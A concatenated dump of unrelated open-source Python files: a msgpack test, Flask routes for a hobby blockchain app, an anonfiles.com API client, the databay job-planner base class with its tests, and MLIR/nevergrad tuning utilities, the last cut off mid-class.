exported_vars = list([x for x in exported_vars if x != "struct" and x != "collections" and x != "datetime" and x !=
"sys" and x != "io" and x != "xrange" and x != "Hashable"])
self.assertTrue(len(exported_vars) == len(exported_vars_test_vector))
for var in exported_vars_test_vector:
self.assertTrue(var in exported_vars)
def test_load_short_read(self):
# When reading from files, the network, etc. there's no guarantee that
# read(n) returns n bytes. Simulate this with a file-like object that
# returns 1 byte at a time.
class SlowFile(object):
def __init__(self, data):
self._data = data
def read(self, n=None):
if n is None or len(self._data) == 0:
data, self._data = self._data, b''
return data
chunk = self._data[0:1]
self._data = self._data[1:]
return chunk
obj = {'hello': 'world'}
f = SlowFile(umsgpack.dumps(obj))
unpacked = umsgpack.load(f)
self.assertEqual(unpacked, obj)
if __name__ == '__main__':
unittest.main()
``` |
{
"source": "00MB/lottocoin",
"score": 3
} |
#### File: lottocoin/lottocoin/routes.py
```python
from lottocoin.models import User
from lottocoin.forms import *
from flask import Flask, jsonify, request, render_template, url_for, flash, redirect
from lottocoin import app, db, bcrypt
from lottocoin import blockchainObj
from flask_login import login_user, current_user, logout_user, login_required
from Crypto.PublicKey import RSA
from expiringdict import ExpiringDict
import requests
#FLASK ROUTES
current_sessions = ExpiringDict(max_len=500, max_age_seconds=500)
@app.route("/")
@app.route("/home")
@app.route("/blockchain")
def home():
blockchainObj.resolveConflicts();
return render_template('blockchain.html', title = "Blockchain", blockchain = blockchainObj);
@app.route("/transaction", methods=['GET', 'POST'])
def transaction():
form = TransactionForm();
formNL = TransactionFormNotLoggedIn();
#print(form.sender.data, form.reciever.data, form.amount.data, form.key.data);
#print("hi");
if form.validate_on_submit():
print("hi");
#print(form.sender.data, form.reciever.data, form.amount.data, form.key.data);
#print(type(form.key.data));
if form.amount.data > blockchainObj.getBalance(form.sender.data):
return render_template('error.html', title = "Error", error="You do not have enough coins to make this transaction.")
feedback = blockchainObj.addTransaction(form.sender.data, form.reciever.data, form.amount.data, form.key.data, form.key.data);
if feedback:
flash(f'Transaction Made!', 'success');
else:
flash(f'Error!', 'danger');
return render_template('transaction.html', title = "Transaction", blockchain = blockchainObj, form=form, formNL= formNL);
if formNL.validate_on_submit():
return redirect(url_for('login'));
return render_template('transaction.html', title = "Transaction", blockchain = blockchainObj, form=form, formNL= formNL);
@app.route("/minerPage")
def minerPage():
return render_template('minerPage.html', title = "Mine", blockchain = blockchainObj);
@app.route("/purchase", methods=['GET', 'POST'])
def purchase():
form = TransactionForm();
formNL = TransactionFormNotLoggedIn();
#print(form.sender.data, form.reciever.data, form.amount.data, form.key.data);
#print("hi");
if form.validate_on_submit():
print("hi");
#print(form.sender.data, form.reciever.data, form.amount.data, form.key.data);
#print(type(form.key.data));
feedback = blockchainObj.addTransaction(form.sender.data, form.reciever.data, form.amount.data, form.key.data, form.key.data);
if feedback:
flash(f'Transaction Made!', 'success');
else:
flash(f'Error!', 'danger');
return render_template('purchase.html', title = "Purchase", blockchain = blockchainObj, form=form, formNL= formNL);
@app.route("/register", methods=['GET', 'POST'])
def register():
form = RegistrationForm()
if form.validate_on_submit():
#password hashing
hashed_password = bcrypt.generate_password_hash(form.password.data).decode('utf-8');
keyGen = blockchainObj.generateKeys();
        user = User(name=form.name.data, username=form.username.data, email=form.email.data, password=hashed_password, key = keyGen);
db.session.add(user);
db.session.commit();
login_user(user);
nextPage = request.args.get('next');
flash(f'Account created for @{form.username.data}! You are now logged in as well.', 'success')
return redirect(nextPage) if nextPage else redirect(url_for('home'));
return render_template('register.html', form=form)
@app.route("/login", methods=['GET', 'POST'])
def login():
form = LoginForm()
if form.validate_on_submit():
user = User.query.filter_by(email=form.email.data).first();
if user and bcrypt.check_password_hash(user.password, form.password.data):
login_user(user, remember=form.remember.data);
nextPage = request.args.get('next');
flash(f'Welcome! You are now logged in', 'success');
global current_sessions
current_sessions[user.username] = current_user
print(current_sessions)
return redirect(nextPage) if nextPage else redirect(url_for('home'));
else:
flash('Login Unsuccessful. Please check email and password', 'danger');
#return redirect(url_for('login'))
return render_template('login.html', form=form);
@app.route("/logout")
def logout():
global current_sessions
    current_sessions.pop(current_user.username, None)
logout_user();
return redirect(url_for('home'));
@app.route("/account")
@login_required
def account():
return render_template('account.html', title='Account', blockchain = blockchainObj)
#BLOCKCHAIN BACKEND REQUESTS
@app.route('/mine', methods=['GET'])
def mine():
print("madeit");
miner = request.args.get('miner', None);
lastBlock = blockchainObj.getLastBlock();
if len(blockchainObj.pendingTransactions) <= 1:
flash(f'Not enough pending transactions to mine! (Must be > 1)', 'danger');
else:
feedback = blockchainObj.minePendingTransactions(miner);
if feedback:
flash(f'Block Mined! You have a ticket for the lottery now!', 'success');
else:
flash(f'Error!', 'danger');
return render_template('minerPage.html', title = "Mine", blockchain = blockchainObj);
@app.route('/transactions/new', methods=['POST'])
def new_transaction():
values = request.get_json();
required = ['sender', 'reciever', 'amt']
if not all(k in values for k in required):
return 'Missing values', 400;
index = blockchainObj.addTransaction(values['sender'], values['reciever'], values['amt'])
response = {'message': f'Transaction will be added to Block {index}'}
return jsonify(response), 201;
@app.route('/chain', methods=['GET'])
def full_chain():
response = {
'chain': blockchainObj.chainJSONencode(),
'length': len(blockchainObj.chain),
}
return jsonify(response), 200
#blockchainObj DECENTRALIZED NODES
@app.route('/nodes/register', methods=['POST'])
def register_nodes():
values = request.get_json()
nodes = values.get('nodes')
if nodes is None:
return "Error: Please supply a valid list of nodes", 400
for node in nodes:
blockchainObj.register_node(node)
response = {
'message': 'New nodes have been added',
'total_nodes': list(blockchainObj.nodes),
}
return jsonify(response), 201
@app.route('/nodes/resolve', methods=['GET'])
def consensus():
replaced = blockchainObj.resolveConflicts()
if replaced:
response = {
'message': 'Our chain was replaced',
'new_chain': blockchainObj.chainJSONencode()
}
else:
response = {
'message': 'Our chain is authoritative',
'chain': blockchainObj.chainJSONencode()
}
return jsonify(response), 200
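# Hypothetical client-side sketch (not part of the original routes): shows how
# a peer could exercise the node endpoints above. The base URL and peer address
# are placeholders, and the helper is never called by the application itself.
def _example_peer_client(base_url="http://127.0.0.1:5000"):
    # Register a second node with this one, then trigger conflict resolution.
    resp = requests.post(base_url + "/nodes/register", json={"nodes": ["http://127.0.0.1:5001"]})
    print(resp.json()["message"])
    resp = requests.get(base_url + "/nodes/resolve")
    print(resp.json()["message"])
    # Fetch the full chain held by this node.
    resp = requests.get(base_url + "/chain")
    print(resp.json()["length"])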
@app.route('/lottery')
def lottery():
return render_template('lottery.html', title='Lottery', blockchain = blockchainObj)
@app.route('/users')
def users():
all_usernames = []
all_users = User.query.all()
for x in range(len(all_users)):
all_usernames.append(all_users[x].username)
print(all_usernames)
return render_template('users.html', users=current_sessions, allusers=all_usernames)
``` |
{
"source": "00mjk/anonfile-api",
"score": 2
} |
#### File: src/anonfile/anonfile.py
```python
from __future__ import annotations
import html
import os
import re
import sys
from dataclasses import dataclass
from functools import wraps
from pathlib import Path
from typing import List, Tuple
from urllib.parse import ParseResult, urljoin, urlparse
from urllib.request import getproxies
import requests
from faker import Faker
from requests import Session
from requests.adapters import HTTPAdapter
from requests.models import Response
from tqdm import tqdm
from tqdm.utils import CallbackIOWrapper
from urllib3 import Retry
__version__ = "0.2.4"
package_name = "anonfile"
python_major = "3"
python_minor = "7"
try:
assert sys.version_info >= (int(python_major), int(python_minor))
except AssertionError:
raise RuntimeError(f"{package_name!r} requires Python {python_major}.{python_minor}+ (You have Python {sys.version})")
@dataclass(frozen=True)
class ParseResponse:
response: Response
file_path: Path
@property
def json(self) -> dict:
"""
Return the entire HTTP response.
"""
return self.response.json()
@property
def status(self) -> bool:
"""
Return the upload status. If `false`, an error message indicating the
cause for the malfunction will be redirected to `sys.stderr`.
"""
status = bool(self.json['status'])
if not status:
print(self.json['error']['message'], file=sys.stderr)
print(self.json['error']['type'], file=sys.stderr)
print(self.json['error']['code'], file=sys.stderr)
return status
@property
def url(self) -> ParseResult:
"""
Return the URL associated with the uploaded file.
"""
return urlparse(self.json['data']['file']['url']['full'])
#region metadata
@property
def id(self) -> str:
"""
Return the ID (path) of the uploaded file.
"""
return self.json['data']['file']['metadata']['id']
@property
def name(self) -> Path:
"""
Return the filename of the uploaded file.
"""
return Path(self.json['data']['file']['metadata']['name'])
@property
def size(self) -> int:
"""
Return the uploaded file size in bytes.
"""
return int(self.json['data']['file']['metadata']['size']['bytes'])
#endregion
class AnonFile:
_timeout = (5, 5)
_total = 5
_status_forcelist = [413, 429, 500, 502, 503, 504]
_backoff_factor = 1
_fake = Faker()
API = "https://api.anonfiles.com/"
__slots__ = ['endpoint', 'token', 'timeout', 'total', 'status_forcelist', 'backoff_factor']
def __init__(self,
token: str="",
timeout: Tuple[float,float]=_timeout,
total: int=_total,
status_forcelist: List[int]=_status_forcelist,
backoff_factor: int=_backoff_factor) -> AnonFile:
self.token = token
self.timeout = timeout
        self.total = total
        self.status_forcelist = status_forcelist
self.backoff_factor = backoff_factor
@staticmethod
def __progressbar_options(iterable, desc, unit, color: str="\033[32m", char='\u25CB', total=None, disable=False) -> dict:
"""
Return custom optional arguments for `tqdm` progressbars.
"""
return {
'iterable': iterable,
'bar_format': "{l_bar}%s{bar}%s{r_bar}" % (color, "\033[0m"),
'ascii': char.rjust(9, ' '),
'desc': desc,
'unit': unit.rjust(1, ' '),
'unit_scale': True,
'unit_divisor': 1024,
'total': len(iterable) if total is None else total,
'disable': not disable
}
@property
def retry_strategy(self) -> Retry:
"""
The retry strategy returns the retry configuration made up of the
number of total retries, the status forcelist as well as the backoff
factor. It is used in the session property where these values are
passed to the HTTPAdapter.
"""
return Retry(total=self.total,
status_forcelist=self.status_forcelist,
backoff_factor=self.backoff_factor
)
@property
def session(self) -> Session:
"""
Create a custom session object. A request session provides cookie
persistence, connection-pooling, and further configuration options.
"""
assert_status_hook = lambda response, *args, **kwargs: response.raise_for_status()
session = requests.Session()
session.mount("https://", HTTPAdapter(max_retries=self.retry_strategy))
session.hooks['response'] = [assert_status_hook]
session.headers.update({
"User-Agent" : AnonFile._fake.chrome(version_from=80, version_to=86, build_from=4100, build_to=4200)
})
return session
def authenticated(func):
@wraps(func)
def wrapper(self, *args, **kwargs):
try:
if self.token is not None:
return func(self, *args, **kwargs)
else:
raise Exception("[!] Error: API key is not configured.")
except Exception as exception:
print(exception, file=sys.stderr)
return wrapper
@authenticated
def upload(self, path: str, progressbar: bool=False) -> ParseResponse:
"""
Upload a file located in `path` to http://anonfiles.com.
Example
-------
```
from anonfile import AnonFile
anon = AnonFile('my_token')
result = anon.upload('test.txt')
# https://anonfiles.com/9ee1jcu6u9/test_txt
print(result.url.geturl())
```
Note
----
- `AnonFile` offers unlimited bandwidth
- Uploads cannot exceed a file size of 20G
"""
size = os.stat(path).st_size
options = AnonFile.__progressbar_options(None, f"Upload: {Path(path).name}", unit='B', total=size, disable=progressbar)
with open(path, mode='rb') as file_handler:
with tqdm(**options) as tqdm_handler:
response = self.session.post(
urljoin(AnonFile.API, 'upload'),
params={'token': self.token},
files={'file': CallbackIOWrapper(tqdm_handler.update, file_handler, 'read')},
timeout=self.timeout,
proxies=getproxies(),
verify=True
)
return ParseResponse(response, Path(path))
@authenticated
def download(self, url: str, path: Path=Path.cwd(), progressbar: bool=False) -> ParseResponse:
"""
Download a file from https://anonfiles.com given a `url`. Set the download
directory in `path` (uses the current working directory by default).
Example
-------
```
from pathlib import Path
from anonfile import AnonFile
anon = AnonFile('my_token')
target_dir = Path.home().joinpath('Downloads')
result = anon.download("https://anonfiles.com/9ee1jcu6u9/test_txt", target_dir)
# WindowsPath('C:/Users/username/Downloads/test.txt')
print(result.file_path)
```
"""
get = lambda url, **kwargs: self.session.get(url, timeout=self.timeout, proxies=getproxies(), **kwargs)
info = get(urljoin(AnonFile.API, f"v2/file/{urlparse(url).path.split('/')[1]}/info"))
info.encoding = 'utf-8'
links = re.findall(r'''.*?href=['"](.*?)['"].*?''', html.unescape(get(url).text), re.I)
download_link = next(filter(lambda link: 'cdn-' in link, links))
file_path = path.joinpath(Path(urlparse(download_link).path).name)
download = ParseResponse(info, file_path)
options = AnonFile.__progressbar_options(None, f"Download {download.id}", unit='B', total=download.size, disable=progressbar)
with open(file_path, mode='wb') as file_handler:
with tqdm(**options) as tqdm_handler:
for chunk in get(download_link, stream=True).iter_content(1024):
tqdm_handler.update(len(chunk))
file_handler.write(chunk)
return download
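# Hypothetical end-to-end sketch (not part of the original module): chains the
# upload and download calls documented above. The token and file name are
# placeholders; the helper is never called on import.
def _example_round_trip():
    anon = AnonFile('my_token')
    result = anon.upload('test.txt', progressbar=True)
    if result.status:
        downloaded = anon.download(result.url.geturl(), Path.cwd(), progressbar=True)
        print(downloaded.file_path)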
``` |
{
"source": "00mjk/databay",
"score": 3
} |
#### File: databay/databay/base_planner.py
```python
import logging
from abc import ABC, abstractmethod
from typing import List, Union
from databay.errors import MissingLinkError
from databay.link import Link
_LOGGER = logging.getLogger('databay.BasePlanner')
class BasePlanner(ABC):
"""
Base abstract class for a job planner. Implementations should handle scheduling link transfers based on :py:class:`datetime.timedelta` intervals.
"""
def __init__(self, links: Union[Link, List[Link]] = None):
"""
:type links: :any:`Link` or list[:any:`Link`]
:param links: Links that should be added and scheduled.
"""
self._links = []
if links is not None:
self.add_links(links)
@property
def links(self):
"""
Links currently handled by this planner.
:return: list[:any:`Link`]
"""
return self._links
def add_links(self, links: Union[Link, List[Link]]):
"""
        Add new links to this planner. This can be run once the planner is already running.
:type links: :any:`Link` or list[:any:`Link`]
:param links: Links that should be added and scheduled.
"""
if not isinstance(links, list):
links = [links]
for link in links:
assert isinstance(link, Link)
self._links.append(link)
self._schedule(link)
_LOGGER.info('Added link: %s', link)
    def remove_links(self, links: Union[Link, List[Link]]):
"""
        Remove links from this planner. This can be run once the planner is already running.
:type links: :any:`Link` or list[:any:`Link`]
:param links: Links that should be unscheduled and removed.
:raises: :py:class:`MissingLinkError <errors.MissingLinkError>` if link is not found.
"""
if not isinstance(links, list):
links = [links]
for link in links:
if link not in self._links:
raise MissingLinkError(
f'Planner does not contain the link: {link}')
if link.job is not None:
self._unschedule(link)
self._links.remove(link)
@abstractmethod
def _schedule(self, link: Link):
"""
Schedule a link. Note that links expect to be given a job upon scheduling by calling :py:func:`Link.set_job <databay.link.Link.set_job>` method.
Override this method to provide scheduling logic.
:type link: :any:`Link`
:param link: Link to be scheduled
"""
raise NotImplementedError()
@abstractmethod
def _unschedule(self, link: Link):
"""
Unschedule a link.
Override this method to provide unscheduling logic.
:type link: :any:`Link`
:param link: Link to be unscheduled
"""
raise NotImplementedError()
def start(self):
"""
Start this planner. Links will start being scheduled based on their intervals after calling this method. The exact methodology depends on the planner implementation used.
This will also loop over all links and call the on_start callback before starting the planner.
See :ref:`Start and Shutdown <start_shutdown>` to learn more about starting and shutdown.
"""
_LOGGER.info('Starting %s' % str(self))
for link in self.links:
link.on_start()
self._start_planner()
def shutdown(self, wait: bool = True):
"""
Shutdown this planner. Links will stop being scheduled after calling this method. Remaining link jobs may still execute after calling this method depending on the concrete planner implementation.
This will also loop over all links and call the on_shutdown callback after shutting down the planner.
See :ref:`Start and Shutdown <start_shutdown>` to learn more about starting and shutdown.
"""
_LOGGER.info('Shutting down %s' % str(self))
self._shutdown_planner(wait)
for link in self.links:
link.on_shutdown()
@abstractmethod
def _start_planner(self):
"""
Override this method to provide starting functionality.
"""
raise NotImplementedError()
@abstractmethod
def _shutdown_planner(self, wait: bool = True):
"""
Override this method to provide shutdown functionality.
"""
raise NotImplementedError()
def purge(self):
"""
        Unschedule and clear all links. This can be used while the planner is running.
"""
for link in self.links:
self._unschedule(link)
self._links = []
@property
@abstractmethod
def running(self):
"""
Whether this planner is currently running.
Override this property to indicate when the underlying scheduling functionality is currently running.
"""
raise NotImplementedError()
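# Minimal concrete sketch (not part of databay): illustrates the contract
# described by the abstract methods above. It assumes Link exposes transfer()
# and an interval timedelta, as databay's bundled planners do -- treat those
# names as assumptions rather than guaranteed API.
import threading
import time
class SimpleThreadPlanner(BasePlanner):
    """Run each link's transfer() in a daemon thread at its interval."""
    def __init__(self, links=None):
        self._running = False
        self._threads = {}
        super().__init__(links)
    def _schedule(self, link: Link):
        def job():
            while self._running:
                link.transfer()  # assumed Link API
                time.sleep(link.interval.total_seconds())  # assumed Link API
        thread = threading.Thread(target=job, daemon=True)
        self._threads[link] = thread
        link.set_job(thread)  # planners must hand each link a job object
        if self._running:
            thread.start()
    def _unschedule(self, link: Link):
        self._threads.pop(link, None)
        link.set_job(None)
    def _start_planner(self):
        self._running = True
        for thread in self._threads.values():
            thread.start()
    def _shutdown_planner(self, wait: bool = True):
        self._running = False
        if wait:
            for thread in self._threads.values():
                thread.join(timeout=1)
    @property
    def running(self):
        return self._running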
```
#### File: test/unit/test_base_planner.py
```python
import logging
from datetime import timedelta
from unittest import TestCase, mock
from unittest.mock import patch, MagicMock
import databay
from databay import BasePlanner, Link
from databay.errors import MissingLinkError
from test_utils import fqname
class TestBasePlanner(TestCase):
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
logging.getLogger('databay').setLevel(logging.WARNING)
@patch.multiple(BasePlanner, __abstractmethods__=set())
def setUp(self):
self.planner = BasePlanner()
self.planner._schedule = MagicMock(
side_effect=lambda link: link.set_job(object()))
self.planner._unschedule = MagicMock(
side_effect=lambda link: link.set_job(None))
self.planner._start_planner = MagicMock()
self.planner._shutdown_planner = MagicMock()
@patch(fqname(Link), spec=Link)
def test_add_links(self, link):
def set_job(job):
link.job = job
link.set_job.side_effect = set_job
link.job = None
self.planner.add_links(link)
self.assertIsNotNone(link.job, 'Link should contain a job')
self.assertTrue(link in self.planner.links,
'Planner should contain the link')
@patch(fqname(Link), spec=Link)
def test_add_links_array(self, link):
def set_job(job):
link.job = job
link.set_job.side_effect = set_job
link.job = None
self.planner.add_links([link])
self.assertIsNotNone(link.job, 'Link should contain a job')
self.assertTrue(link in self.planner.links,
'Planner should contain the link')
@patch(fqname(Link), spec=Link)
def test_remove_links(self, link):
def set_job(job):
link.job = job
link.set_job.side_effect = set_job
link.job = None
self.planner.add_links(link)
self.planner.remove_links(link)
self.assertIsNone(link.job, 'Link should not contain a job')
self.assertTrue(link not in self.planner.links,
'Planner should not contain the link')
@patch(fqname(Link), spec=Link)
def test_remove_invalid_link(self, link):
def set_job(job):
link.job = job
link.set_job.side_effect = set_job
link.job = None
self.assertRaises(MissingLinkError, self.planner.remove_links, link)
self.assertIsNone(link.job, 'Link should not contain a job')
self.assertTrue(link not in self.planner.links,
'Planner should not contain the link')
@patch(fqname(Link), spec=Link)
def test_start(self, link):
self.planner.add_links(link)
self.planner.start()
link.on_start.assert_called()
self.planner._start_planner.assert_called()
@patch(fqname(Link), spec=Link)
def test_shutdown(self, link):
self.planner.add_links(link)
self.planner.shutdown()
link.on_shutdown.assert_called()
self.planner._shutdown_planner.assert_called()
@patch(fqname(Link), spec=Link)
def test_start_order(self, link):
# on_start should be called before _start_planner
link.on_start.side_effect = lambda: self.planner._start_planner.assert_not_called()
self.planner.add_links(link)
self.planner.start()
# finally both should be called
link.on_start.assert_called()
self.planner._start_planner.assert_called()
@patch(fqname(Link), spec=Link)
def test_shutdown_order(self, link):
# on_shutdown should be called after _shutdown_planner
self.planner._shutdown_planner.side_effect = lambda wait: link.on_shutdown.assert_not_called()
self.planner.add_links(link)
self.planner.shutdown()
# finally both should be called
link.on_shutdown.assert_called()
self.planner._shutdown_planner.assert_called()
@patch(fqname(Link), spec=Link)
def test_purge(self, link):
self.planner.add_links(link)
self.planner.purge()
self.planner._unschedule.assert_called_with(link)
self.assertEqual(self.planner.links, [])
@patch(fqname(Link), spec=Link)
def test_purge_while_running(self, link):
self.planner.add_links(link)
self.planner.start()
self.planner.purge()
self.planner._unschedule.assert_called_with(link)
self.assertEqual(self.planner.links, [])
self.planner.shutdown()
``` |
{
"source": "00mjk/iree-llvm-sandbox",
"score": 3
} |
#### File: examples/core/nevergrad_tuner_utils.py
```python
import typing as tp
from argparse import ArgumentParser
import numpy as np
from typing import Callable, Sequence
import mlir.ir as ir
debug_constraints = False
def save_module(module, module_save_filename):
"""Helper function to save a module to a file."""
with open(module_save_filename, 'w') as f:
f.write(str(module))
print(f'Module saved in {module_save_filename}')
class NGSchedulerInterface:
"""Generic interface for schedule search via nevergrad."""
def build_compile_time_problem_sizes(self):
"""Build the dictionary of (dimension_name, size) giving the sizes to compile"""
pass
def create_matchers(self, module, benefit: int = 1):
"""Create the PDL matchers
Create the PDL IR for matchers / constraints inside `module`.
"""
pass
def schedule(self, module, proposal, benefit: int = 1):
"""Create the PDL matchers
Create the PDL IR for schedule inside `module`.
"""
pass
def save_proposal_as_module(self,
proposal,
module_save_filename,
benefit: int = 1):
with ir.Context() as ctx, ir.Location.unknown() as loc:
module = ir.Module.create()
self.schedule(module, proposal, benefit)
      save_module(module, module_save_filename)
################################################################################
### Nevergrad constraints.
### TODO: somehow connect to PDL matchers.
################################################################################
def constraint_all_must_divide(problem_sizes: Sequence[int],
search_sizes: Sequence[int]):
"""Constraint to specify `search_sizes` are either 0 or divide `problem_sizes`."""
if debug_constraints:
print(f'C1 problem_sizes:{problem_sizes} vs search_sizes:{search_sizes}')
for size, search_size in zip(problem_sizes, search_sizes):
if search_size != 0 and size % search_size != 0:
return False
return True
def constraint_unrolling_not_too_big(problem_sizes: Sequence[int],
search_sizes: Sequence[int],
unrolling_limit: int):
"""Constraint to specify `search_sizes` do not yield too much unrolling."""
if debug_constraints:
print(f'C2 problem_sizes:{problem_sizes} vs search_sizes:{search_sizes}')
prod = 1
for size, search_size in zip(problem_sizes, search_sizes):
prod = prod * size if search_size == 0 else prod * search_size
if debug_constraints:
print(f'C2 prod {prod}')
return prod < unrolling_limit
def constraint_in_bounds(problem_sizes: Sequence[int],
search_sizes: Sequence[int]):
"""Constraint to limit `search_sizes` to the extent of the problem_sizes."""
if debug_constraints:
print(f'C3 problem_sizes:{problem_sizes} vs search_sizes:{search_sizes}')
for size, search_size in zip(problem_sizes, search_sizes):
if search_size > size:
return False
return True
def constraint_volume_not_too_small(
problem_sizes: Sequence[int], search_sizes: Sequence[int],
volume_limit: int, volume_relative_percentage_lower_bound: int):
"""Constraint to skip `search_sizes` that would yield a too small volume."""
if debug_constraints:
print(f'C4 problem_sizes:{problem_sizes} vs search_sizes:{search_sizes}')
size_prod = np.prod(problem_sizes)
search_size_prod = 1
for size, search_size in zip(problem_sizes, search_sizes):
search_size_prod = search_size_prod * size \
if search_size == 0 else search_size_prod * search_size
return search_size_prod >= volume_limit or \
100 * search_size_prod + 1 > volume_relative_percentage_lower_bound * size_prod
def size_constraints_conjunction_satisfied(
problem_sizes: Sequence[int],
search_sizes: Sequence[int],
unrolling_limit: int = 10000,
volume_limit: int = 16,
volume_relative_percentage_lower_bound: int = 25):
"""Constraint to perform the conjunction of known constraints."""
return constraint_unrolling_not_too_big(problem_sizes, \
search_sizes, \
unrolling_limit) \
and constraint_volume_not_too_small(problem_sizes, \
search_sizes, \
volume_limit, \
volume_relative_percentage_lower_bound) \
and constraint_in_bounds(problem_sizes, search_sizes)
# A `proposal` coming from Nevergrad contains a tuple of (*args, **kwargs)
# we want to extract the search sizes and we need to unwrap the np.array to
# a list.
def dispatch_size_constraints_conjunction_satisfied(
problem_sizes: Sequence[int], proposal, keyword):
# Unwrap the np.array
proposed_search_sizes = [x for x in proposal[1][keyword]]
return size_constraints_conjunction_satisfied(problem_sizes,
proposed_search_sizes)
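# Hypothetical wiring sketch (not part of the original file): shows how the
# dispatch helper above is intended to be attached to a nevergrad
# parametrization as a cheap constraint. The keyword 'ts' and the bounds are
# placeholders; the nevergrad import is assumed to be available at tuning time.
def example_register_tile_size_constraint(problem_sizes: Sequence[int]):
  import nevergrad as ng
  # One integer size per problem dimension; 0 conventionally means "do not tile".
  tile_sizes = ng.p.Array(shape=(len(problem_sizes),))
  tile_sizes.set_bounds(0, max(problem_sizes)).set_integer_casting()
  parametrization = ng.p.Instrumentation(ts=tile_sizes)
  # Nevergrad hands each proposal over as an (args, kwargs) tuple, which is
  # exactly what dispatch_size_constraints_conjunction_satisfied unwraps.
  parametrization.register_cheap_constraint(
      lambda proposal: dispatch_size_constraints_conjunction_satisfied(
          problem_sizes, proposal, 'ts'))
  return parametrization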
################################################################################
### Argparser
################################################################################
def add_argparser_tuning_arguments(parser: ArgumentParser):
"""Add tuning-specific arguments to the parser."""
parser.add_argument('--machine-peak', type=int, nargs='?', default=192)
parser.add_argument('--metric-to-measure',
type=str,
nargs='?',
default='gflop_per_s_per_iter')
parser.add_argument(
'--output-dir',
type=str,
nargs='?',
)
parser.add_argument('--num-parallel-tasks', type=int, nargs='?', default=1)
parser.add_argument('--num-cpus-per-benchmark',
type=int,
nargs='?',
default=1)
parser.add_argument('--random-seed', type=int, nargs='?', default=42)
parser.add_argument('--search-budget', type=int, nargs='?', default=100)
parser.add_argument(
'--search-strategy',
type=str,
nargs='?',
default='RandomSearch',
)
parser.add_argument('--timeout-per-compilation',
type=float,
nargs='?',
default=5)
# Until ExecutionEngine pickles, we are both compiling and evaluating.
parser.add_argument('--timeout-per-benchmark',
type=float,
nargs='?',
default=1)
```
#### File: examples/fusion/definitions.py
```python
import os, sys, time
from typing import Any, List, Mapping, Optional, Sequence
import numpy as np
from mlir.ir import *
from mlir.dialects import arith, builtin, linalg, tensor, scf, func
from mlir.dialects.linalg.opdsl.lang import *
from ..core.compilation import attach_inplaceable_attributes, attach_passthrough
from ..core.problem_definition import *
from ..core.utils import *
# TODO: Orthogonal configuration object.
avx512 = True
################################################################################
### Matmul
################################################################################
# Op def: ( m, n, k )
# Iters: ({Par(), Par(), Red()})
# A B C
# Layout: {{m, k}, {k, n}, {m, n}}
class MatmulProblem(ProblemDefinition):
""" Problem definition for a single fill + matmul problem."""
def shapes_builder(self, sizes: Mapping[str, Any]) -> List[List[int]]:
"""Shape builder function.
Given a mapping between dimension names / op attributes and their numeric
values, return the list of lists of shapes of the FuncOp operands. The
FuncOp is responsible for distinguishing between input operands and results.
"""
M, N, K = sizes["M"], sizes["N"], sizes["K"]
return [[M, K], [K, N], [M, N]]
def gflop_count_builder(self, sizes: Mapping[str, Any]) -> float:
"""GFlop builder function.
Given a mapping between dimension names / op attributes and their numeric
values, return the number of GFlops computed.
"""
M, N, K = sizes["M"], sizes["N"], sizes["K"]
return float(2.0 * M * N * K) / float(1e9)
def gbyte_count_builder(self, sizes: Mapping[str, Any],
types: Sequence[np.dtype]) -> float:
"""GByte builder function.
Given a mapping between dimension names / op attributes and their numeric
values, and a list of data types, return the number of GBytes read or
written.
"""
M, N, K = sizes["M"], sizes["N"], sizes["K"]
lhs_np_type, rhs_np_type, acc_np_type = types
    return float(M * K * np.dtype(lhs_np_type).itemsize +
                 K * N * np.dtype(rhs_np_type).itemsize +
                 M * N * np.dtype(acc_np_type).itemsize) / float(1e9)
def tensors_np_builder(self, sizes: Mapping[str, Any],
types: Sequence[np.dtype]) -> List[np.dtype]:
"""NumPy tensors building function.
Given a mapping between dimension names / op attributes and their numeric
values, and a list of NumPy elemental types, return constructed NP values of
shapes given by `shape_builder` and specified elemental types.
"""
shapes = self.shapes_builder(sizes)
tensors = [
realign(np.random.rand(*s).astype(t), byte_alignment=64)
for s, t in zip(shapes, types)
]
# Uncomment to simplify debugging.
# tensors = [
# realign(np.arange(1, np.prod(s) + 1).reshape(s).astype(t), \
# byte_alignment=64) \
# for s, t in zip(shapes, np_types)
# ]
tensors[len(tensors) - 1].fill(0.)
return tensors
def check_np(self, A: np.dtype, B: np.dtype, C: np.dtype) -> None:
"""NumPy checking function.
Given a list of NumPy values, check the precomputed results matches those of
the expected reference implementation.
"""
if not np.allclose(C, np.dot(A, B)):
delta = C - np.dot(A, B)
max_abs_delta = max(delta.max(), delta.min(), key=abs)
raise Exception(f"max_abs_delta: {max_abs_delta} -> FAILURE ")
def types_mlir_builder(self, sizes: Mapping[str, Any],
types: Sequence[Type]) -> List[Type]:
"""MLIR types builder.
Given a mapping between dimension names / op attributes and their numeric
values, and a list of elemental MLIR types, return MLIR tensor types of the
shape expected by the function.
"""
shapes = self.shapes_builder(sizes)
return [RankedTensorType.get(s, t) for s, t in zip(shapes, types)]
def build_problem_under_context_manager(
self, name: str, types: Sequence[Type],
zero_at_each_iteration: bool) -> builtin.FuncOp:
"""MLIR problem builder.
Given a list of MLIR shaped types, build and return the MLIR FuncOp that
implements the desired computation on those types.
"""
global avx512
# Actual benchmarked function called under entry_point_name.
bench = builtin.FuncOp(name, (types, [types[-1]]))
# TODO: need something much more flexible to add function argument attributes.
attach_inplaceable_attributes(bench, inplaceable=[False, False, True])
attach_passthrough(
bench, [StringAttr.get(os.getenv('SANDBOX_INLINING', 'noinline'))],
avx512=avx512)
acc_type = types[-1].element_type
with InsertionPoint(bench.add_entry_block()):
tensor_zero = bench.arguments[2]
if zero_at_each_iteration:
zero = arith.ConstantOp(types[-1].element_type, 0.0)
tensor_zero = linalg.FillOp(output=tensor_zero, value=zero)
matmul = linalg.matmul(bench.arguments[0],
bench.arguments[1],
outs=[tensor_zero])
# linalg.matmul returns a Value instead of OpView, so we have to manually
# wrap it in a list here.
func.ReturnOp([matmul])
return bench
# TODO: fold OpDSL definition and inferences into ProblemDefinition.
@linalg_structured_op
def add_bias_to_2d(I=TensorDef(T, S.M, S.N),
Bias=TensorDef(T, S.N),
O=TensorDef(T, S.M, S.N, output=True)):
domain(D.m, D.n)
O[D.m, D.n] = I[D.m, D.n] + Bias[D.n]
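# In NumPy terms (illustrative), add_bias_to_2d computes O = I + Bias with the
# bias broadcast across rows, e.g. np.random.rand(4, 3) + np.random.rand(3).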
class MatmulBiasAddProblem(ProblemDefinition):
""" Problem definition for a fill + matmul + generic op."""
